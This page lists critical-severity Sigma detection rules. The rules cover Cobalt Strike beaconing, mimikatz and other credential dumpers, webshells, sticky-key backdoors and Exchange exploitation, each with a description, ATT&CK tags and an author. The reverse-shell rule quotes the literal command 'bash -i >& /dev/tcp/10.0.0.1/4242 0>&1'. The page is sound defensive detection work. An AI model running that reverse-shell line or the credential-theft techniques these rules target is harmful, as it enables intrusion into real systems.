Rule Library

Sigma Rules

171 rules found

3,707Total
3,116Detection
451Emerging
137Hunting
Detectioncriticaltest

Bitbucket Unauthorized Access To A Resource

Detects unauthorized access attempts to a resource.

bitbucketaudit
TA0042 · Resource DevelopmentT1586 · Compromise Accounts
Muhammad FaisalSun Feb 25application
Detectioncriticaltest

Bitbucket Unauthorized Full Data Export Triggered

Detects when full data export is attempted an unauthorized user.

bitbucketaudit
TA0009 · CollectionTA0042 · Resource DevelopmentT1213.003 · Code RepositoriesT1586 · Compromise Accounts
Muhammad FaisalSun Feb 25application
Detectioncriticalstable

Antivirus Exploitation Framework Detection

Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Antivirus Alert
TA0002 · ExecutionT1203 · Exploitation for Client ExecutionTA0011 · Command and Controlattack.t1219.002
Florian Roth (Nextron Systems)+1Sun Sep 09category
Detectioncriticalstable

Antivirus Password Dumper Detection

Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Antivirus Alert
TA0006 · Credential AccessT1003 · OS Credential DumpingT1558 · Steal or Forge Kerberos TicketsT1003.001 · LSASS Memory+1
Florian Roth (Nextron Systems)+1Sun Sep 09category
Detectioncriticaltest

Antivirus Ransomware Detection

Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Antivirus Alert
T1486 · Data Encrypted for ImpactTA0040 · Impact
Florian Roth (Nextron Systems)+1Thu May 12category
Detectioncriticaltest

Possible Coin Miner CPU Priority Param

Detects command line parameter very often used with coin miners

Linuxauditd
TA0004 · Privilege EscalationT1068 · Exploitation for Privilege Escalation
Florian Roth (Nextron Systems)Sat Oct 09linux
Detectioncriticaltest

Webshell Remote Command Execution

Detects possible command execution by web application/web shell

Linuxauditd
TA0003 · PersistenceT1505.003 · Web Shell
Ilyas Ochkov+2Sat Oct 12linux
Detectioncriticaltest

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

LinuxNetwork Connection
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Sat Oct 16linux
Detectioncriticaltest

Cobalt Strike DNS Beaconing

Detects suspicious DNS queries known from Cobalt Strike beacons

dns
TA0011 · Command and ControlT1071.004 · DNS
Florian Roth (Nextron Systems)Thu May 10network
Detectioncriticaltest

HackTool - BabyShark Agent Default URL Pattern

Detects Baby Shark C2 Framework default communication patterns

Proxy Log
TA0011 · Command and ControlT1071.001 · Web Protocols
Florian Roth (Nextron Systems)Wed Jun 09web
Detectioncriticaltest

PwnDrp Access

Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity

Proxy Log
TA0011 · Command and ControlT1071.001 · Web ProtocolsT1102.001 · Dead Drop ResolverT1102.003 · One-Way Communication
Florian Roth (Nextron Systems)Wed Apr 15web
Detectioncriticaltest

Audit CVE Event

Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.

Windowsapplication
TA0002 · ExecutionT1203 · Exploitation for Client ExecutionTA0004 · Privilege EscalationT1068 · Exploitation for Privilege Escalation+8
Florian Roth (Nextron Systems)+1Wed Jan 15windows
Detectioncriticaltest

Suspicious Cobalt Strike DNS Beaconing - DNS Client

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

Windowsdns-client
T1071.004 · DNSTA0011 · Command and Control
Nasreddine Bencherchali (Nextron Systems)Mon Jan 16windows
Detectioncriticaltest

ProxyLogon MSExchange OabVirtualDirectory

Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory

Windowsmsexchange-management
T1587.001 · MalwareTA0042 · Resource Development
Florian Roth (Nextron Systems)Mon Aug 09windows
Detectioncriticaltest

Certificate Request Export to Exchange Webserver

Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell

Windowsmsexchange-management
TA0003 · PersistenceT1505.003 · Web Shell
Max Altgelt (Nextron Systems)Mon Aug 23windows
Detectioncriticaltest

Mailbox Export to Exchange Webserver

Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it

Windowsmsexchange-management
TA0003 · PersistenceT1505.003 · Web Shell
Florian Roth (Nextron Systems)+2Mon Aug 09windows
Detectioncriticaltest

DiagTrackEoP Default Login Username

Detects the default "UserName" used by the DiagTrackEoP POC

Windowssecurity
TA0004 · Privilege Escalation
Nasreddine Bencherchali (Nextron Systems)Wed Aug 03windows
Detectioncriticaltest

AD Object WriteDAC Access

Detects WRITE_DAC access to a domain object

Windowssecurity
TA0005 · Defense Evasionattack.t1222.001
Roberto Rodriguez (Cyb3rWard0g)Thu Sep 12windows
Detectioncriticaltest

Active Directory Replication from Non Machine Account

Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.

Windowssecurity
TA0006 · Credential AccessT1003.006 · DCSync
Roberto Rodriguez (Cyb3rWard0g)Fri Jul 26windows
Detectioncriticaltest

WCE wceaux.dll Access

Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host

Windowssecurity
TA0006 · Credential AccessT1003 · OS Credential DumpingS0005 · S0005
Thomas PatzkeWed Jun 14windows
Detectioncriticaltest

Win Susp Computer Name Containing Samtheadmin

Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool

Windowssecurity
TA0001 · Initial AccessTA0005 · Defense Evasioncve.2021-42278cve.2021-42287+3
elhoimFri Sep 09windows
Detectioncriticalstable

Zerologon Exploitation Using Well-known Tools

This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.

Windowssystem
T1210 · Exploitation of Remote ServicesTA0008 · Lateral Movement
Demyan Sokolin+2Tue Oct 13windows
Detectioncriticaltest

CobaltStrike Service Installations - System

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement

Windowssystem
TA0003 · PersistenceTA0002 · ExecutionTA0004 · Privilege EscalationTA0008 · Lateral Movement+3
Florian Roth (Nextron Systems)+1Wed May 26windows
Detectioncriticaltest

Moriya Rootkit - System

Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report

Windowssystem
TA0003 · PersistenceTA0004 · Privilege EscalationT1543.003 · Windows Service
Bhabesh RajThu May 06windows
Detectioncriticaltest

Suspicious Cobalt Strike DNS Beaconing - Sysmon

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

WindowsDNS Query
TA0011 · Command and ControlT1071.004 · DNS
Florian Roth (Nextron Systems)Tue Nov 09windows
Detectioncriticaltest

Potential DCOM InternetExplorer.Application DLL Hijack

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

WindowsFile Event
TA0008 · Lateral MovementT1021.002 · SMB/Windows Admin SharesT1021.003 · Distributed Component Object Model
Roberto Rodriguez (Cyb3rWard0g)+2Mon Oct 12windows
Detectioncriticaltest

HackTool - Dumpert Process Dumper Default File

Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory

WindowsFile Event
TA0006 · Credential AccessT1003.001 · LSASS Memory
Florian Roth (Nextron Systems)Tue Feb 04windows
Detectioncriticaltest

HackTool - Inveigh Execution Artefacts

Detects the presence and execution of Inveigh via dropped artefacts

WindowsFile Event
TA0011 · Command and Controlattack.t1219.002
Nasreddine Bencherchali (Nextron Systems)Mon Oct 24windows
Detectioncriticaltest

HackTool - Mimikatz Kirbi File Creation

Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.

WindowsFile Event
TA0006 · Credential AccessT1558 · Steal or Forge Kerberos Tickets
Florian Roth (Nextron Systems)+1Mon Nov 08windows
Detectioncriticaltest

HackTool - QuarksPwDump Dump File

Detects a dump file written by QuarksPwDump password dumper

WindowsFile Event
TA0006 · Credential AccessT1003.002 · Security Account Manager
Florian Roth (Nextron Systems)Sat Feb 10windows
Detectioncriticaltest

Wmiexec Default Output File

Detects the creation of the default output filename used by the wmiexec tool

WindowsFile Event
TA0008 · Lateral MovementTA0002 · ExecutionT1047 · Windows Management Instrumentation
Nasreddine Bencherchali (Nextron Systems)Thu Jun 02windows
Detectioncriticaltest

Wmiprvse Wbemcomn DLL Hijack - File

Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.

WindowsFile Event
TA0002 · ExecutionT1047 · Windows Management InstrumentationTA0008 · Lateral MovementT1021.002 · SMB/Windows Admin Shares
Roberto Rodriguez (Cyb3rWard0g)+1Mon Oct 12windows
Detectioncriticaltest

Potential DCOM InternetExplorer.Application DLL Hijack - Image Load

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class

WindowsImage Load (DLL)
TA0008 · Lateral MovementT1021.002 · SMB/Windows Admin SharesT1021.003 · Distributed Component Object Model
Roberto Rodriguez (Cyb3rWard0g)+2Mon Oct 12windows
Detectioncriticaltest

CobaltStrike Named Pipe

Detects the creation of a named pipe as used by CobaltStrike

WindowsNamed Pipe Created
TA0005 · Defense EvasionTA0004 · Privilege EscalationT1055 · Process Injection
Florian Roth (Nextron Systems)+1Tue May 25windows
Detectioncriticaltest

CobaltStrike Named Pipe Pattern Regex

Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles

WindowsNamed Pipe Created
TA0005 · Defense EvasionTA0004 · Privilege EscalationT1055 · Process Injection
Florian Roth (Nextron Systems)Fri Jul 30windows
Detectioncriticaltest

HackTool - DiagTrackEoP Default Named Pipe

Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.

WindowsNamed Pipe Created
TA0004 · Privilege Escalation
Nasreddine Bencherchali (Nextron Systems)Wed Aug 03windows
Detectioncriticaltest

HackTool - Credential Dumping Tools Named Pipe Created

Detects well-known credential dumping tools execution via specific named pipe creation

WindowsNamed Pipe Created
TA0006 · Credential AccessT1003.001 · LSASS MemoryT1003.002 · Security Account ManagerT1003.004 · LSA Secrets+1
Teymur Kheirkhabarov+1Fri Nov 01windows
Detectioncriticaltest

HackTool - Koh Default Named Pipe

Detects creation of default named pipes used by the Koh tool

WindowsNamed Pipe Created
TA0005 · Defense EvasionTA0004 · Privilege EscalationTA0006 · Credential AccessT1528 · Steal Application Access Token+1
Nasreddine Bencherchali (Nextron Systems)Fri Jul 08windows
Detectioncriticaltest

Malicious Named Pipe Created

Detects the creation of a named pipe seen used by known APTs or malware.

WindowsNamed Pipe Created
TA0005 · Defense EvasionTA0004 · Privilege EscalationT1055 · Process Injection
Florian Roth (Nextron Systems)+2Mon Nov 06windows
Detectioncriticaltest

Bad Opsec Powershell Code Artifacts

focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.

WindowsPowerShell Module
TA0002 · ExecutionT1059.001 · PowerShell
ok invrep_de+1Fri Oct 09windows
Detectioncriticaltest

Silence.EDA Detection

Detects Silence EmpireDNSAgent as described in the Group-IP report

WindowsPowerShell Script
TA0002 · ExecutionT1059.001 · PowerShellTA0011 · Command and ControlT1071.004 · DNS+5
Alina Stepchenkova+2Fri Nov 01windows
Detectioncriticaltest

Suspicious PowerShell Mailbox Export to Share - PS

Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations

WindowsPowerShell Script
TA0010 · Exfiltration
Nasreddine Bencherchali (Nextron Systems)Wed Oct 26windows
Detectioncriticaltest

Persistence Via Sticky Key Backdoor

By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched.

WindowsProcess Creation
TA0003 · PersistenceT1546.008 · Accessibility FeaturesTA0004 · Privilege Escalation
SreemanTue Feb 18windows
Detectioncriticaltest

Sticky Key Like Backdoor Execution

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

WindowsProcess Creation
TA0004 · Privilege EscalationTA0003 · PersistenceT1546.008 · Accessibility Features2014-11-003 · CAR 2014-11-003+1
Florian Roth (Nextron Systems)+2Thu Mar 15windows
Detectioncriticaltest

HackTool - F-Secure C3 Load by Rundll32

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

WindowsProcess Creation
TA0005 · Defense EvasionT1218.011 · Rundll32
Alfie Champion (ajpc500)Wed Jun 02windows
Detectioncriticaltest

HackTool - DInjector PowerShell Cradle Execution

Detects the use of the Dinject PowerShell cradle based on the specific flags

WindowsProcess Creation
TA0004 · Privilege EscalationTA0005 · Defense EvasionT1055 · Process Injection
Florian Roth (Nextron Systems)Tue Dec 07windows
Detectioncriticaltest

HackTool - Dumpert Process Dumper Execution

Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

WindowsProcess Creation
TA0006 · Credential AccessT1003.001 · LSASS Memory
Florian Roth (Nextron Systems)Tue Feb 04windows
Detectioncriticalstable

HackTool - Empire PowerShell UAC Bypass

Detects some Empire PowerShell UAC bypass methods

WindowsProcess Creation
TA0005 · Defense EvasionTA0004 · Privilege EscalationT1548.002 · Bypass User Account Control2019-04-001 · CAR 2019-04-001
EccoFri Aug 30windows